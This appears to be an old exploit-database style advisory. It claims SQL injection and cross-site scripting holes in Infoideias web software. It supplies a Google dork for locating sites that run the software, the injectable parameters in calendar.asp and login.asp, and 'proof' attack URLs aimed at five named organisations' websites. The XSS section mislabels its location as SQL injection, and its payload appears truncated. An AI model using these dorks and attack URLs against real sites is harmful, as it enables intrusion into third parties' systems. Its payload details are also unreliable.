#******************************************************************************** # Exploit Title : Infoideias Multiple Vulnerabilites # # Exploit Author : Ashiyane Digital Security Team # # Software Link : http://www.infoideias.com.br # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Powered by Infoideias" # # Date: 2013/09/10 # -------------------------------------------------------------------- # Exploit : Sql Injection # # Location : [Target]/incrio/calendar.asp?auxid=[Sql Injection] # # # Proof: # # http://www.americansocietyrio.org/incrio/calendar.asp?auxid=' # # http://www.bcsrio.org.br/incrio/calendar.asp?auxid=' # # http://www.christchurchrio.org.br/incrio/calendar.asp?auxid=' # # http://www.riosocieties.com.br//incrio/calendar.asp?auxid=' # # http://riosocieti.dominiotemporario.com/incrio/calendar.asp?auxid=' # -------------------------------------------------------------------- # Exploit 2 : Cross site scripting # # Location : [Target]/incrio/login.asp?button=Login&login=[Sql Injection] # # # Proof: # # http://www.americansocietyrio.org/incrio/login.asp?button=Login&login= "/> # # http://www.bcsrio.org.br/incrio/incrio/login.asp?button=Login&login= "/> # # http://www.christchurchrio.org.br/incrio/login.asp?button=Login&login= "/> # # http://www.riosocieties.com.br/incrio/login.asp?button=Login&login= "/> # # http://riosocieti.dominiotemporario.com/incrio/login.asp?button=Login&login= "/> # ###################### discovered by : ACC3SS ######################